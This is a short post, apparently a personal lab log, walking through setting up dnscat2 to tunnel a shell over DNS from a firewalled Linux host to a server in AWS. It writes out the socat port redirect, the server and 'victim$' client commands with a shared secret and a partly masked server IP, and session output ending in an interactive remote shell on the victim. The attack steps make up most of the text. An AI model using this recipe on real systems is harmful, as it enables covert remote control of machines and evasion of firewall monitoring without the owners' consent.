Wanted to test dns tunneling and came across dnscat2.
Got a copy from https://github.com/iagox86/dnscat2
Tried it out and it worked.
My setup was dnscat2 linux client behind firewall connects outbound to dnscat2 server in AWS. Use socat to redirect udp packets from 53 to 5333. dnscat2 server requests shell on client and receives interactive shell.
Will certainly be using this again.
Update – more details
socat redirect from port 53 to 5333
attacker$ sudo socat UDP4-RECVFROM:53,fork UDP4-SENDTO:localhost:5333
Install dnscat2 and run as non root
No domain name specified so this mode of dnscat2 will require clients to query our server directly.
attacker$ ruby ./dnscat2.rb --dnsport=5333 --secret=mysecret
Build and run dnscat2 client on linux
victim$ ./dnscat --dns=server=54.191.x.x --secret=mysecret
On the server side you should see the new session established
New window created: 1 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) dnscat2> sessions 0 :: main [active] crypto-debug :: Debug window for crypto stuff [*] dns1 :: DNS Driver running on 0.0.0.0:5333 domains = [*] 1 :: command (kali) [encrypted and verified] [*] [idle for 19 seconds]
Then to start an interactive os shell issue the shell command from the initial session 1
dnscat2> session -i 1 New window created: 1 history_size (session) => 1000 Session 1 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) This is a command session! That means you can enter a dnscat2 command such as 'ping'! For a full list of clients, try 'help'.
Run the shell command
command (kali) 1> shell Sent request to execute a shell command (kali) 1> New window created: 2 Shell session created!
Connect to the new session 2
command (kali) 1> session -i 2 New window created: 2 history_size (session) => 1000 Session 2 Security: ENCRYPTED AND VERIFIED! (the security depends on the strength of your pre-shared secret!) This is a console session! That means that anything you type will be sent as-is to the client, and anything they type will be displayed as-is on the screen! If the client is executing a command and you don't see a prompt, try typing 'pwd' or something! To go back, type ctrl-z.
Now you can issue shell commands
sh (kali) 2> id sh (kali) 2> uid=1000(bob) gid=1001(bob) groups=1001(bob)